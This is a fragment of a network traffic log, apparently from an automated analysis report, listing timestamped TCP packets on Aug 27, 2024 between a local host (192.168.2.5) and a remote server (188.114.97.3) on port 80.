                              Aug 27, 2024 09:48:56.814512968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814523935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814532042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814542055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814552069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814559937 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.814563990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814585924 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.814599991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.814650059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814661026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814702034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.814755917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814766884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814775944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814786911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814798117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814807892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.814820051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.814831018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815048933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815058947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815073013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815084934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815094948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815102100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815104961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815116882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815123081 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815129042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815140963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815145016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815159082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815187931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815264940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815278053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815316916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815633059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815644026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815660000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815700054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815732002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815742016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815751076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815763950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815777063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815793037 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.815977097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.815988064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.816001892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.816019058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.816028118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.816029072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.816040039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.816050053 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.816051006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.816076040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.816097975 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818070889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818080902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818089962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818099022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818111897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818123102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818134069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818135977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818161964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818239927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818303108 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818480015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818546057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818556070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818586111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818738937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818747997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818759918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818770885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818782091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.818788052 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818809032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.818833113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.820766926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.820785046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.820837021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.821014881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.821024895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.821034908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.821069002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.821198940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.821208000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.821217060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.821244955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.821269989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.823951006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.823976040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.823987007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.824028969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.824038982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.824039936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.824048996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.824060917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.824068069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.824084044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.829910994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.829924107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.829933882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.829969883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.829976082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.829979897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.829991102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.830003023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.830008984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.830044031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.830054045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883115053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883147955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883160114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883209944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883230925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883241892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883255959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883270979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883272886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883285046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883318901 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883341074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883342028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883356094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883409023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883411884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883424044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883435011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883446932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883460045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883481026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883773088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883801937 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883816957 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.883969069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.883980036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.884017944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.884162903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.884172916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.884185076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.884196997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.884207964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.884244919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.885947943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.885967970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.885978937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.886018991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.886095047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.886105061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.886117935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.886130095 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.886131048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.886154890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903007030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903016090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903119087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903600931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903610945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903620958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903631926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903644085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903644085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903656006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903671026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903671980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903682947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903695107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903700113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903706074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903717041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903739929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903750896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903757095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903760910 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903760910 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903769016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903780937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903784037 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903791904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903804064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.903806925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.903855085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904333115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904342890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904352903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904362917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904381990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904383898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904395103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904407978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904414892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904421091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904433012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904442072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904444933 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904453993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904464960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904469013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904475927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904489994 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904495001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904506922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904516935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.904520035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.904561043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905088902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905103922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905114889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905124903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905134916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905142069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905153036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905162096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905164003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905198097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905213118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905250072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905261993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905301094 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905445099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905571938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905584097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905594110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905607939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.905611038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.905642033 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.907732964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907776117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.907907009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907918930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907929897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907941103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907953024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907958984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.907964945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907977104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.907995939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.908032894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.908478975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908525944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.908643961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908655882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908663034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908674002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908685923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.908720016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.908798933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908809900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.908869028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.910109997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910119057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910161018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.910283089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910295010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910305977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910315990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910329103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910340071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.910348892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.910387039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.913290024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913300991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913311005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913321018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913331032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913338900 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.913342953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913356066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913364887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.913366079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.913383961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.913414955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.920857906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.920870066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.920881987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.920932055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.920991898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.921003103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.921013117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.921024084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.921032906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.921056032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.968796015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.971743107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971785069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971796989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971865892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.971889019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971899986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971910000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971921921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971932888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.971936941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.971957922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.971993923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.972017050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972029924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972042084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972054005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972080946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.972103119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.972140074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972151995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972191095 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.972295046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972306013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972317934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972352982 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.972399950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972410917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972445965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.972459078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972470045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972479105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.972512960 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.974504948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974515915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974525928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974539042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.974555016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.974558115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974572897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974598885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.974668980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974684000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974695921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.974708080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.974735975 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991348028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991359949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991369963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991410971 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991431952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991442919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991455078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991468906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991506100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991517067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991528034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991539001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991549969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991564989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991601944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991671085 CEST8061383188.114.97.3192.168.2.5
